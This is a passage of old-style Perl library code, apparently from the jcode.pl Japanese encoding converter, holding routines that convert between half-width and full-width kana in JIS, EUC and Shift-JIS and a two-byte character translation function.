	1 while $s =~ s/(($re_jis0208)[^\e]*)($re_jis0208)/$1/o;
    }
    $n;
}
sub _h2z_jis {
    local($s) = @_;
    $n += $s =~ s/(([\041-\137])([\136\137])?)/
	$h2z{$1} || $h2z{$2} . $h2z{$3}
    /ge;
    $s;
}

sub h2z_euc {
    local(*s) = @_;
    $s =~ s/\216([\241-\337])(\216([\336\337]))?/
	$h2z{"$1$3"} || $h2z{$1} . $h2z{$3}
    /ge;
}

sub h2z_sjis {
    local(*s, $n) = @_;
    $s =~ s/(($re_sjis_c)+)|(([\241-\337])([\336\337])?)/
	$1 || ($n++, $h2z{$3} ? $e2s{$h2z{$3}} || &e2s($h2z{$3})
			      : &e2s($h2z{$4}) . ($5 && &e2s($h2z{$5})))
    /geo;
    $n;
}

;#
;# X0208 -> X0201 KANA conversion routine
;#
sub z2h_jis {
    local(*s, $n) = @_;
    $s =~ s/($re_jis0208)([^\e]+)/&_z2h_jis($2)/geo;
    $n;
}
sub _z2h_jis {
    local($s) = @_;
    $s =~ s/((\%[!-~]|![\#\"&VW+,<])+|([^!%][!-~]|![^\#\"&VW+,<])+)/
	&__z2h_jis($1)
    /ge;
    $s;
}
sub __z2h_jis {
    local($s) = @_;
    return $esc_0208 . $s unless $s =~ /^%/ || $s =~ /^![\#\"&VW+,<]/;
    $n += length($s) / 2;
    $s =~ s/(..)/$z2h{$1}/g;
    $esc_kana . $s;
}

sub z2h_euc {
    local(*s, $n) = @_;
    &init_z2h_euc unless defined %z2h_euc;
    $s =~ s/($re_euc_c|$re_euc_kana)/
	$z2h_euc{$1} ? ($n++, $z2h_euc{$1}) : $1
    /geo;
    $n;
}

sub z2h_sjis {
    local(*s, $n) = @_;
    &init_z2h_sjis unless defined %z2h_sjis;
    $s =~ s/($re_sjis_c)/$z2h_sjis{$1} ? ($n++, $z2h_sjis{$1}) : $1/geo;
    $n;
}

;#
;# Initializing JIS X0208 to X0201 KANA table for EUC and SJIS.  This
;# can be done in &init but it's not worth doing.  Similarly,
;# precalculated table is not worth to occupy the file space and
;# reduce the readability.  The author personnaly discourages to use
;# X0201 Kana character in the any situation.
;#
sub init_z2h_euc {
    local($k, $s);
    while (($k, $s) = each %z2h) {
	$s =~ s/([\241-\337])/\216$1/g && ($z2h_euc{$k} = $s);
    }
}
sub init_z2h_sjis {
    local($s, $v);
    while (($s, $v) = each %z2h) {
	$s =~ /[\200-\377]/ && ($z2h_sjis{&e2s($s)} = $v);
    }
}

;#
;# TR function for 2-byte code
;#
sub tr {
    # $prev_from, $prev_to, %table are persistent variables
    local(*s, $from, $to, $opt) = @_;
    local(@from, @to);
    local($jis, $n) = (0, 0);
    
    $jis++, &jis2euc(*s) if $s =~ /$re_jp|$re_asc|$re_kana/o;
    $jis++ if $to =~ /$re_jp|$re_asc|$re_kana/o;

    if (!defined($prev_from) || $from ne $prev_from || $to ne $prev_to) {
	($prev_from, $prev_to) = ($from, $to);
	undef %table;
	&_maketable;
    }

    $s =~ s/([\200-\377][\000-\377]|[\000-\377])/
	defined($table{$1}) && ++$n ? $table{$1} : $1
    /ge;

    &euc2jis(*s) if $jis;

    $n;
}

sub _maketable {
    local($ascii) = '(\\\\[\\-\\\\]|[\0-\133\135-\177])';

    &jis2euc(*to) if $to =~ /$re_jp|$re_asc|$re_kana/o;
    &jis2euc(*from) if $from =~ /$re_jp|$re_asc|$re_kana/o;

    grep(s/(([\200-\377])[\200-\377]-\2[\200-\377])/&_expnd2($1)/ge,
	 $from, $to);
    grep(s/($ascii-$ascii)/&_expnd1($1)/geo,
	 $from, $to);

    @to   = $to   =~ /[\200-\377][\000-\377]|[\000-\377]/g;
    @from = $from =~ /[\200-\377][\000-\377]|[\000-\377]/g;
    push(@to, ($opt =~ /d/ ? '' : $to[$#to]) x (@from - @to)) if @to < @from;
    @table{@from} = @to;
}

sub _expnd1 {
    local($s) = @_;
    $s =~ s/\\(.)/$1/g;
    local($c1, $c2) = unpack('CxC', $s);
    if ($c1 <= $c2) {
	for ($s = ''; $c1 <= $c2; $c1++) {
	    $s .= pack('C', $c1);
	}
    }
    $s;
}

sub _expnd2 {
    local($s) = @_;
    local($c1, $c2, $c3, $c4) = unpack('CCxCC', $s);
    if ($c1 == $c3 && $c2 <= $c4) {
	for ($s = ''; $c2 <= $c4; $c2++) {
	    $s .= pack('CC', $c1, $c2);
	}
    }
    $s;
}

1;

